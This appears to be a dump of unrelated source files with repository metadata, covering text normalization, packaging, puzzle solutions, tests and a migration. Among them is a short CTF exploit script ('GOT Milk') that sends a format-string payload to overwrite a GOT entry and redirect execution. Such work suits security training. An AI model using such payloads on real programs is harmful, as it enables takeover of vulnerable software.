from pynini.examples import plurals
from pynini.lib import pynutil
class WordFst(GraphFst):
    """
    Finite state transducer for classifying word. Considers sentence boundary exceptions.
        e.g. sleep -> tokens { name: "sleep" }

    Args:
        punctuation: PunctuationFst
        deterministic: if True will provide a single transduction option,
            for False multiple transduction are generated (used for audio-based normalization)
    """

    def __init__(self, punctuation: GraphFst, deterministic: bool = True):
        super().__init__(name="word", kind="classify", deterministic=deterministic)
        punct = PunctuationFst().graph
        # Fallback: any run of non-space, non-punctuation characters.
        default_graph = pynini.closure(pynini.difference(NEMO_NOT_SPACE, punct.project("input")), 1)
        # Currency/number symbols must not be swallowed into plain words.
        symbols_to_exclude = (pynini.union("$", "€", "₩", "£", "¥", "#", "%") | NEMO_DIGIT).optimize()
        graph = pynini.closure(pynini.difference(NEMO_NOT_SPACE, symbols_to_exclude), 1)
        # Prefer the symbol-free path via a small negative weight.
        graph = pynutil.add_weight(graph, MIN_NEG_WEIGHT) | default_graph

        # leave phones of format [HH AH0 L OW1] untouched
        phoneme_unit = pynini.closure(NEMO_ALPHA, 1) + pynini.closure(NEMO_DIGIT)
        phoneme = (
            pynini.accep(pynini.escape("["))
            + pynini.closure(phoneme_unit + pynini.accep(" "))
            + phoneme_unit
            + pynini.accep(pynini.escape("]"))
        )

        # leave IPA phones of format [ˈdoʊv] untouched, single words and sentences with punctuation marks allowed
        punct_marks = pynini.union(*punctuation.punct_marks).optimize()
        stress = pynini.union("ˈ", "'", "ˌ")
        ipa_phoneme_unit = pynini.string_file(get_abs_path("data/whitelist/ipa_symbols.tsv"))
        # word in ipa form
        ipa_phonemes = (
            pynini.closure(stress, 0, 1)
            + pynini.closure(ipa_phoneme_unit, 1)
            + pynini.closure(stress | ipa_phoneme_unit)
        )
        # allow sentences of words in IPA format separated with spaces or punct marks
        delim = (punct_marks | pynini.accep(" ")) ** (1, ...)
        ipa_phonemes = ipa_phonemes + pynini.closure(delim + ipa_phonemes) + pynini.closure(delim, 0, 1)
        ipa_phonemes = (pynini.accep(pynini.escape("[")) + ipa_phonemes + pynini.accep(pynini.escape("]"))).optimize()

        if not deterministic:
            # Non-deterministic mode additionally tolerates optional spaces
            # just inside the ARPABET brackets.
            phoneme = (
                pynini.accep(pynini.escape("["))
                + pynini.closure(pynini.accep(" "), 0, 1)
                + pynini.closure(phoneme_unit + pynini.accep(" "))
                + phoneme_unit
                + pynini.closure(pynini.accep(" "), 0, 1)
                + pynini.accep(pynini.escape("]"))
            ).optimize()
            ipa_phonemes = (
                pynini.accep(pynini.escape("[")) + ipa_phonemes + pynini.accep(pynini.escape("]"))
            ).optimize()

        phoneme |= ipa_phonemes
        # Phoneme spans win over plain-word matches where both apply.
        self.graph = plurals._priority_union(convert_space(phoneme.optimize()), graph, NEMO_SIGMA)
        self.fst = (pynutil.insert("name: \"") + self.graph + pynutil.insert("\"")).optimize()
| [
"noreply@github.com"
] | ericharper.noreply@github.com |
43828f5474ff42399bbff1723cd7221e5eef2dbd | ec85250addb7357dfe7bb3e0680d53fc7b0fd8fb | /python_modules/libraries/dagster-mlflow/setup.py | 552314aa025f85b9bf1cad2666fbd2c3b17c9277 | [
"Apache-2.0"
] | permissive | dagster-io/dagster | 6adb5deee8bcf3ea1866a6a64f2ed81e1db5e73a | fe21995e0402878437a828c6a4244025eac8c43b | refs/heads/master | 2023-09-05T20:46:08.203794 | 2023-09-05T19:54:52 | 2023-09-05T19:54:52 | 131,619,646 | 8,565 | 1,154 | Apache-2.0 | 2023-09-14T21:57:37 | 2018-04-30T16:30:04 | Python | UTF-8 | Python | false | false | 1,182 | py | from pathlib import Path
from typing import Dict
from setuptools import find_packages, setup
def get_version() -> str:
    """Read __version__ out of dagster_mlflow/version.py by executing it."""
    namespace: Dict[str, str] = {}
    version_file = Path(__file__).parent / "dagster_mlflow/version.py"
    with open(version_file, encoding="utf8") as source:
        exec(source.read(), namespace)
    return namespace["__version__"]
ver = get_version()
# don't pin dev installs to avoid pip dep resolver issues
pin = "" if ver == "1!0+dev" else f"=={ver}"
setup(
    name="dagster-mlflow",
    version=get_version(),
    author="Elementl",
    author_email="hello@elementl.com",
    license="Apache-2.0",
    description="Package for mlflow Dagster framework components.",
    url="https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-mlflow",
    classifiers=[
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: OS Independent",
    ],
    packages=find_packages(exclude=["dagster_mlflow_tests*"]),
    # Core dagster is pinned to this package's own version except in dev builds.
    install_requires=[f"dagster{pin}", "mlflow", "pandas"],
    zip_safe=False,
)
| [
"noreply@github.com"
] | dagster-io.noreply@github.com |
4e6c7fc37d96589973c336770f2c0e6558b4a563 | 3b2867636844ab4b402ef091b61222a5870bae6e | /year2017/day11.py | 75e64438afc7810775e932d8cd33d43f4edb59b7 | [] | no_license | feigaoxyz/adventofcode | f992478ff6518930a60b9d4e15e5902d1f208f06 | 18918e16709eef833544f48d8c1a46c93d950000 | refs/heads/master | 2021-06-21T18:33:45.229440 | 2021-01-12T16:10:03 | 2021-01-12T16:10:03 | 51,060,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,276 | py | from common import load_input
import math
import collections
PART1_DOC = """Part 1:
"""

PART2_DOC = """Part 2:
"""

example = """
"""

# Puzzle input is loaded at import time from the sibling *_in.txt file.
input_data = load_input(__file__.split('.')[0] + '_in.txt').strip()

# Neighbour offsets for the six hex directions (axial-style coordinates).
dir2pos = {
    'ne': (1, 0),
    'n': (0, 1),
    'nw': (-1, 1),
    's': (0, -1),
    'sw': (-1, 0),
    'se': (1, -1)
}
def hex_distance(steps: str, init_pos: (int, int) = (0, 0)) -> (int, (int, int)):
    """Walk the comma-separated ``steps`` from ``init_pos``.

    Returns (distance from origin, final (x, y) position).  With the offsets
    in ``dir2pos``, when x and y share a sign the moves cannot cancel, so the
    distance is |x| + |y|; with opposite signs one diagonal step advances both
    axes at once, so the distance is max(|x|, |y|).
    """
    # print(collections.Counter(steps.split(',')))
    x, y = init_pos
    for step in steps.split(','):
        dx, dy = dir2pos[step]
        x += dx
        y += dy
    if x * y >= 0:
        return (abs(x) + abs(y), (x, y))
    else:
        return max(abs(x), abs(y)), (x, y)


fn_p1 = hex_distance
print("Part 1 example:", fn_p1("ne,ne,ne"))
print("Part 1 example:", fn_p1("ne,ne,sw,sw"))
print("Part 1 example:", fn_p1("ne,ne,s,s"))
print("Part 1 example:", fn_p1("se,sw,se,sw,sw"))
print("Part 1:", fn_p1(input_data))  # 682
def furthest(steps: str) -> int:
    """Replay the path one step at a time and return the greatest distance
    from the origin ever reached (part 2 of the puzzle)."""
    pos = (0, 0)
    max_dist = 0
    for step in steps.split(','):
        # Feeding single steps threads the running position through hex_distance.
        dist, pos = hex_distance(step, pos)
        if dist > max_dist:
            max_dist = dist
    return max_dist


fn_p2 = furthest
# print("Part 2 example:", fn_p2(example))
print("Part 2:", fn_p2(input_data))  # 1406
| [
"contact@feigao.org"
] | contact@feigao.org |
ae4b7f7157b4d2db0c88c8dc2ca34403c999109b | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /090_logging/_exercises/_templates/github/_python-logging-examples-master(1)/python-logging-examples-master/simplelogging.py | f557ad857ecc4355d986269d2a0513a869a4214a | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 365 | py | """ uses logging instead of prints, but no explicit logging config"""
______ verboselib
______ ?
__ -n __ '__main__':
vl _ verboselib.Noisy()
?.i..("This, and the logging from Noisy, will not be output.")
?.i..("because the default level is w..")
vl.do_debug()
vl.do_info()
?.w..("Watch out! about to log from noisy!")
vl.do_warn()
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
396b9355988ee6e7eaf7adba310ca1b98eda3d28 | 53384d9322bc867dc55e1c057052e6a65101fde5 | /project-addons/alg_custom/product.py | 57835f451306b0b17a1098b2f076b60525f28211 | [] | no_license | Comunitea/PXGO_00015_2014_alg | ce80059a843e2eb76c7eee889fb64d45729add84 | 83026b9eab791dd8892dfb39cd0b07ada23aa2ab | refs/heads/master | 2020-12-26T01:16:18.482404 | 2019-05-20T12:36:18 | 2019-05-20T12:36:18 | 58,064,428 | 0 | 0 | null | 2016-05-04T15:47:27 | 2016-05-04T15:47:26 | null | UTF-8 | Python | false | false | 1,271 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2014 Pexego (<http://www.pexego.es>).
# $Omar Castiñeira Saavedra$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
class ProductProduct(orm.Model):
    """Extends product.product with two clean-part flags (old v7 _columns API)."""
    _inherit = "product.product"

    _columns = {
        # Marks the product as a clean part.
        'clean_part': fields.boolean('Clean Part product'),
        # "Production Associated" flag — presumably set by production logic
        # elsewhere; confirm against the modules that write it.
        'clean_part_prod': fields.boolean('Production Associated')
    }
| [
"javierjcf@gmail.com"
] | javierjcf@gmail.com |
c437147abe11532977bc856b8a12cd72feafb324 | ec7591c3f478c43e76257aaa500d8f6a2e763d74 | /stanza/tests/pipeline/test_pipeline_constituency_processor.py | 9a5372063a5f6a995ccdbd1378abb6c219a5306c | [
"Apache-2.0"
] | permissive | stanfordnlp/stanza | 5cc3dbe70a96dd565639b7dae1efde6b4fa76985 | c530c9af647d521262b56b717bcc38b0cfc5f1b8 | refs/heads/main | 2023-09-01T12:01:38.980322 | 2023-03-14T16:10:05 | 2023-03-14T16:10:05 | 104,854,615 | 4,281 | 599 | NOASSERTION | 2023-09-10T00:31:36 | 2017-09-26T08:00:56 | Python | UTF-8 | Python | false | false | 2,678 | py |
import pytest
import stanza
from stanza.models.common.foundation_cache import FoundationCache
from stanza.tests import *
pytestmark = [pytest.mark.pipeline, pytest.mark.travis]
# data for testing
TEST_TEXT = "This is a test. Another sentence. Are these sorted?"
# Expected tokenisation of TEST_TEXT, one sublist per sentence.
TEST_TOKENS = [["This", "is", "a", "test", "."], ["Another", "sentence", "."], ["Are", "these", "sorted", "?"]]

@pytest.fixture(scope="module")
def foundation_cache():
    """Module-scoped cache so the pipelines below share loaded foundation models."""
    return FoundationCache()

def check_results(doc):
    """Assert the parsed constituency trees' leaves match TEST_TOKENS."""
    assert len(doc.sentences) == len(TEST_TOKENS)
    for sentence, expected in zip(doc.sentences, TEST_TOKENS):
        assert sentence.constituency.leaf_labels() == expected
def test_sorted_big_batch(foundation_cache):
pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", foundation_cache=foundation_cache)
doc = pipe(TEST_TEXT)
check_results(doc)
def test_comments(foundation_cache):
"""
Test that the pipeline is creating constituency comments
"""
pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", foundation_cache=foundation_cache)
doc = pipe(TEST_TEXT)
check_results(doc)
for sentence in doc.sentences:
assert any(x.startswith("# constituency = ") for x in sentence.comments)
doc.sentences[0].constituency = "asdf"
assert "# constituency = asdf" in doc.sentences[0].comments
for sentence in doc.sentences:
assert len([x for x in sentence.comments if x.startswith("# constituency")]) == 1
def test_illegal_batch_size(foundation_cache):
stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos", constituency_batch_size="zzz", foundation_cache=foundation_cache)
with pytest.raises(ValueError):
stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", constituency_batch_size="zzz", foundation_cache=foundation_cache)
def test_sorted_one_batch(foundation_cache):
    """A batch size of 1 must still yield sentences in the original order."""
    nlp = stanza.Pipeline("en",
                          model_dir=TEST_MODELS_DIR,
                          processors="tokenize,pos,constituency",
                          constituency_batch_size=1,
                          foundation_cache=foundation_cache)
    check_results(nlp(TEST_TEXT))
def test_sorted_two_batch(foundation_cache):
    """A batch size of 2 must still yield sentences in the original order."""
    nlp = stanza.Pipeline("en",
                          model_dir=TEST_MODELS_DIR,
                          processors="tokenize,pos,constituency",
                          constituency_batch_size=2,
                          foundation_cache=foundation_cache)
    check_results(nlp(TEST_TEXT))
def test_get_constituents(foundation_cache):
    """The constituency processor must expose its known constituent labels."""
    # Pass model_dir=TEST_MODELS_DIR like every other test in this module;
    # without it this test would fall back to the default model directory
    # (and potentially download models) instead of using the test fixtures.
    pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", foundation_cache=foundation_cache)
    assert "SBAR" in pipe.processors["constituency"].get_constituents()
| [
"horatio@gmail.com"
] | horatio@gmail.com |
04f239e41086ce3397abfacce7557e7b91529a04 | 9e31cabea36b122be02fa778264a5c9a313a7a3c | /chapter_17/p17_11.py | cfa8e8e01bd74d21fe5d43746d650b0967a3060a | [] | no_license | anywhere1234/CTCI_python | b1c27997fe20d17f48b423e647fed600811ab015 | 6c7e71f4829708da397867dd9b2cec61a654d3f9 | refs/heads/master | 2023-02-09T14:02:29.710006 | 2021-01-06T00:04:58 | 2021-01-06T00:04:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,562 | py | # idea: Reverse index
# create mapping from key: word , value: sorted set of occurences (count words in book)
# when looking for shortest distance between 2 words, run 2 pointers in the sorted arr, find min diff
import re
from typing import List
from collections import defaultdict
import os
def build_reverse_index(words: List[str]):
    """Map each word to the ascending list of positions where it occurs."""
    positions = defaultdict(list)
    for position, word in enumerate(words):
        positions[word].append(position)
    # Hand back a plain dict so lookups of absent words do not insert entries.
    return dict(positions)
def get_min_interword_distance(w1: str, w2: str, rev_index: dict):
    """Return the smallest index distance between any occurrence of w1 and w2.

    :param w1: first word
    :param w2: second word
    :param rev_index: mapping word -> sorted list of occurrence indices
    :raises Exception: if either word has no recorded occurrence
    """
    # Use .get so a word missing from the index reaches the explicit error
    # below; the original rev_index[w1] lookup raised KeyError first, which
    # made the "Not all words present" guard unreachable for missing words.
    occ_w1 = rev_index.get(w1)
    occ_w2 = rev_index.get(w2)
    if not occ_w1 or not occ_w2:
        raise Exception("Not all words present")
    best = float('inf')
    p1 = 0
    p2 = 0
    # Two-pointer sweep over the two sorted occurrence lists.
    while p1 < len(occ_w1) and p2 < len(occ_w2):
        diff_now = abs(occ_w1[p1] - occ_w2[p2])
        if diff_now < best:
            best = diff_now
        # Advance the pointer sitting at the smaller index; moving the other
        # pointer could only widen the gap.
        if occ_w1[p1] > occ_w2[p2]:
            p2 += 1
        else:
            p1 += 1
    return best
if __name__ == "__main__":
    # Load the sample text, split on spaces / newlines / periods, and drop the
    # empty strings the split produces; everything is lower-cased so lookups
    # are case-insensitive.
    with open(os.path.join("utils", "lorem_ipsum.txt")) as words_source:
        all_non_empty_words = filter(
            bool, re.split(" |\n|\.", words_source.read()))
        all_text = list(map(lambda x: x.lower(), all_non_empty_words))
    reverse_index = build_reverse_index(all_text)
    # (word, word) pairs to query against the index
    exs = [
        ("ultrices", "bibendum"),
        ("hendrerit", "nulla"),
    ]
    for w1, w2 in exs:
        print(f"Shortest distance b/t {w1} and {w2}"
              f" at {get_min_interword_distance(w1,w2, reverse_index)}")
| [
"bogdan.stoicescu95@gmail.com"
] | bogdan.stoicescu95@gmail.com |
c1cb502b18baa9d3b28238e40b364115d4dcf14d | e57d7785276053332c633b57f6925c90ad660580 | /sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/asynctestcase.py | 8893eeede181712ff1d1c85e0b584844f1b1b35e | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | adriananeci/azure-sdk-for-python | 0d560308497616a563b6afecbb494a88535da4c5 | b2bdfe659210998d6d479e73b133b6c51eb2c009 | refs/heads/main | 2023-08-18T11:12:21.271042 | 2021-09-10T18:48:44 | 2021-09-10T18:48:44 | 405,684,423 | 1 | 0 | MIT | 2021-09-12T15:51:51 | 2021-09-12T15:51:50 | null | UTF-8 | Python | false | false | 1,383 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import asyncio
import functools
from azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function
from azure.core.credentials import AccessToken
from testcase import QuestionAnsweringTest
class AsyncFakeTokenCredential(object):
    """Async stand-in for classes able to provide OAuth tokens.

    :param str scopes: Lets you specify the type of access needed.
    """
    # Fixed (token, expiry) pair handed back for every request.
    _STATIC_TOKEN = ("YOU SHALL NOT PASS", 0)

    def __init__(self):
        self.token = AccessToken(*self._STATIC_TOKEN)

    async def get_token(self, *args):
        return self.token
class AsyncQuestionAnsweringTest(QuestionAnsweringTest):
    """Async test base: supplies credentials usable by async clients."""

    def generate_oauth_token(self):
        # Live runs authenticate against AAD with a real service principal
        # pulled from the test settings; recorded/playback runs use a fake
        # credential so no secrets are required.
        if self.is_live:
            from azure.identity.aio import ClientSecretCredential
            return ClientSecretCredential(
                self.get_settings_value("TENANT_ID"),
                self.get_settings_value("CLIENT_ID"),
                self.get_settings_value("CLIENT_SECRET"),
            )
        return self.generate_fake_token()

    def generate_fake_token(self):
        # Async fake so awaiting get_token works in playback mode.
        return AsyncFakeTokenCredential()
| [
"noreply@github.com"
] | adriananeci.noreply@github.com |
697a2797b172121b01fb5d02a0a072ac5454aa70 | b41ae9e761a6b4606e128f9572c6f1a896ccfbdc | /migrations/versions/6e71f302e270_thought_table.py | 3b1330909e82e551eaf52ad38b025266c1fd7b15 | [] | no_license | chrishaining/Flask-Stoic-Thoughts | 9e8a4d2be4eb66ecd95b363812ccc289daefbdfd | d31b52d8844fb325825c76674387a88c42ba6a70 | refs/heads/master | 2021-02-07T02:45:33.235475 | 2020-03-01T15:59:37 | 2020-03-01T15:59:37 | 243,973,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | """thought table
Revision ID: 6e71f302e270
Revises:
Create Date: 2020-02-29 12:19:12.158186
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6e71f302e270'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``thought`` table with an index on ``quotation``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('thought',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('quotation', sa.Text(), nullable=True),
    sa.Column('comment', sa.Text(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_thought_quotation'), 'thought', ['quotation'], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Reverse the migration: drop the index, then the ``thought`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_thought_quotation'), table_name='thought')
    op.drop_table('thought')
    # ### end Alembic commands ###
| [
"chrishaining@yahoo.co.uk"
] | chrishaining@yahoo.co.uk |
330a6979ee3a64de179f3b718dcb8e9c5940b492 | faa1a9f8bfa60c6f3c1543ddf5c01ea8d6ec5898 | /CSAW-2019/Pwn/GOT Milk/exploit2.py | b66230aec1df4cf08fba47718917a204d01fb896 | [] | no_license | LJP-TW/CTF | afe0873029072da256b591c96a0b2a97df6644b2 | f9c30cf270130120bfe4ddf957299fb60ddf8c27 | refs/heads/master | 2023-05-27T17:08:56.579815 | 2023-05-22T10:33:42 | 2023-05-22T10:33:42 | 123,657,738 | 30 | 5 | null | 2023-05-22T10:32:56 | 2018-03-03T04:08:05 | Smali | UTF-8 | Python | false | false | 385 | py | from pwn import *
from struct import *
# r = remote('localhost', 5566)
r = remote('pwn.chal.csaw.io', 1004)

# addrLosePlt: address whose stored pointer we overwrite (presumably the GOT
# entry for lose() — TODO confirm against the binary). lose/win live at
# offsets 0x11f8 / 0x1189, so only the low byte (0xf8 -> 0x89) must change.
addrLosePlt = 0x804a010
offsetLose = 0x11f8
offsetWin = 0x1189

raw_input('>')  # pause so a debugger can be attached before sending

# Format-string write: the 4-byte address plus 133 padding chars gives a
# printed count of 137 == 0x89, which %hhn writes as the single low byte.
payload = ''
payload += pack('<I', addrLosePlt) # Will write 4 bytes
payload += '%133x' # Write bytes for %n 0x89
payload += '%7$hhn' # Cover GOT
r.sendline(payload)
r.interactive()
| [
"accr94238@gmail.com"
] | accr94238@gmail.com |
66c8f43291c37439cb67bb146852b74f5ae5d297 | 019e125f8b893512e252aaf27ff6b957c2cc302d | /src/blueshed/fling/request.py | b5acbf2d18d41495e27914684bf74ce67d45c85c | [
"MIT"
] | permissive | blueshed/blueshed-py | 62523beae9e43a8f8ef065a627cae58b238e7244 | 61be378d8e24e60775cc2b8a6f17c6e959098fa2 | refs/heads/master | 2021-01-10T21:29:38.244214 | 2015-09-25T18:16:08 | 2015-09-25T18:16:08 | 38,447,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | '''
Created on Nov 2, 2013
@author: peterb
'''
class Request(object):
    """A named request whose completion is reported through a callback.

    Assigning to ``result`` or ``error`` marks the request as handled and
    invokes the callback (if any) with the request itself.  ``cancel()``
    detaches the callback so a late completion is silently ignored.
    """

    def __init__(self, name, options=None, callback=None, request_id=None):
        self.name = name
        self.options = options
        self.request_id = request_id
        self._callback = callback
        self._handled = False
        self._result = None
        self._error = None

    def cancel(self):
        """Drop the callback; the request may still complete, unobserved."""
        self._callback = None

    def _complete(self):
        """Mark the request handled and notify the callback, if attached."""
        # Shared by the result and error setters, which previously duplicated
        # this handled-then-notify sequence.
        self._handled = True
        if self._callback:
            self._callback(self)

    @property
    def handled(self):
        """True once a result or error has been assigned."""
        return self._handled

    @handled.setter
    def handled(self, value):
        self._handled = value

    @property
    def result(self):
        """The successful outcome, or None if not (yet) set."""
        return self._result

    @result.setter
    def result(self, value):
        self._result = value
        self._complete()

    @property
    def error(self):
        """The failure outcome, or None if not (yet) set."""
        return self._error

    @error.setter
    def error(self, value):
        self._error = value
        self._complete()

    def __str__(self):
        return "request:{}[{}]".format(self.name, self.request_id)
| [
"pete@blueshed.co.uk"
] | pete@blueshed.co.uk |
ce7b219f9a39eb4862625197e86d97bb10c3f8d3 | 6221ffae1ba52c8cbf12795e8696383248aae108 | /tf_agents/train/utils/strategy_utils.py | d2e5caf3763ecbe7d75ddd3b5b99917bfbb73cef | [
"Apache-2.0"
] | permissive | minsukchang/agents | c7a7be5d87d56b56048ec1dee7dcd3b45816d68b | 5b8dd0e589dab4c7d8ef28c3dfb99ba46d7d0f7d | refs/heads/master | 2022-02-13T21:30:30.093985 | 2022-01-25T15:52:09 | 2022-01-25T15:52:36 | 205,996,831 | 0 | 0 | Apache-2.0 | 2019-09-03T05:36:05 | 2019-09-03T05:36:05 | null | UTF-8 | Python | false | false | 2,113 | py | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Utilities for managing distrubtion strategies."""
from absl import flags
from absl import logging
import tensorflow.compat.v2 as tf
flags.DEFINE_string('tpu', None, 'BNS address for the TPU')
flags.DEFINE_bool('use_gpu', False, 'If True a MirroredStrategy will be used.')
def get_strategy(tpu, use_gpu):
  """Utility to create a `tf.DistributionStrategy` for TPU or GPU.

  If neither is being used a DefaultStrategy is returned which allows executing
  on CPU only.

  Args:
    tpu: BNS address of TPU to use. Note the flag and param are called TPU as
      that is what the xmanager utilities call.
    use_gpu: Whether a GPU should be used. This will create a MirroredStrategy.

  Raises:
    ValueError if both tpu and use_gpu are set.

  Returns:
    An instance of a `tf.DistributionStrategy`.
  """
  if tpu and use_gpu:
    raise ValueError('Only one of tpu or use_gpu should be provided.')

  # Neither accelerator requested: fall back to the default (CPU) strategy.
  if not tpu and not use_gpu:
    return tf.distribute.get_strategy()

  logging.info('Devices: \n%s', tf.config.list_logical_devices())
  if tpu:
    resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=tpu)
    tf.config.experimental_connect_to_cluster(resolver)
    tf.tpu.experimental.initialize_tpu_system(resolver)
    strategy = tf.distribute.TPUStrategy(resolver)
  else:
    strategy = tf.distribute.MirroredStrategy()
  logging.info('Devices after getting strategy:\n%s',
               tf.config.list_logical_devices())
  return strategy
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
ec84607554daf8ed75b3f772e636a1ca9442b18b | 09cead98874a64d55b9e5c84b369d3523c890442 | /py200510_python2/day16_py200708/sample/dict_sorting_value.py | 7dbd9333db5eb252d818d16c62b84d787fe96cb9 | [] | no_license | edu-athensoft/stem1401python_student | f12b404d749286036a090e941c0268381ce558f8 | baad017d4cef2994855b008a756758d7b5e119ec | refs/heads/master | 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | """
Python dictionary
Sorting by value
references:
https://blog.csdn.net/buster2014/article/details/50939892
"""
def sort_by_value(mydict):
    """
    :param mydict:
    :return: list of keys ordered by ascending value (ties broken by key)
    """
    # Equivalent to the old approach of building [value, key] pairs and
    # sorting them lexicographically, but without the intermediate lists.
    return sorted(mydict, key=lambda key: (mydict[key], key))
def sort_by_value2(mydict):
    """Return the values of mydict in ascending order."""
    # The previous list comprehension over sorted() was a redundant copy;
    # sorted() already returns a new list.
    return sorted(mydict.values())
def sort_by_value3(mydict):
    """Return the (key, value) pairs of mydict ordered by ascending value."""
    def value_of(item):
        return item[1]
    return sorted(mydict.items(), key=value_of)
# main program
demo_dict = {
1: "c",
2: "a",
3: "b"
}
print("Original dictionary is: {}".format(demo_dict))
print()
# test 1
print("[info] testing sort_by_value()")
print(sort_by_value(demo_dict))
print()
# test 2
print("[info] testing sort_by_value2()")
print(sort_by_value2(demo_dict))
print()
# test 3
print("[info] testing sort_by_value3()")
print(sort_by_value3(demo_dict))
print()
| [
"lada314@gmail.com"
] | lada314@gmail.com |
bcb5f25ce5e10170fb1f81e674fb1c249cd299e2 | a81c07a5663d967c432a61d0b4a09de5187be87b | /components/signin/ios/browser/DEPS | 1cbae6d899d540a81f026f8560d662d4b42aac35 | [
"BSD-3-Clause"
] | permissive | junxuezheng/chromium | c401dec07f19878501801c9e9205a703e8643031 | 381ce9d478b684e0df5d149f59350e3bc634dad3 | refs/heads/master | 2023-02-28T17:07:31.342118 | 2019-09-03T01:42:42 | 2019-09-03T01:42:42 | 205,967,014 | 2 | 0 | BSD-3-Clause | 2019-09-03T01:48:23 | 2019-09-03T01:48:23 | null | UTF-8 | Python | false | false | 391 | specific_include_rules = {
"account_consistency_service.mm": [
"+components/signin/core/browser/account_reconcilor.h",
"+components/signin/core/browser/signin_header_helper.h",
],
"account_consistency_service_unittest.mm": [
"+components/signin/core/browser/account_reconcilor.h",
"+components/signin/core/browser/account_reconcilor_delegate.h",
],
}
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.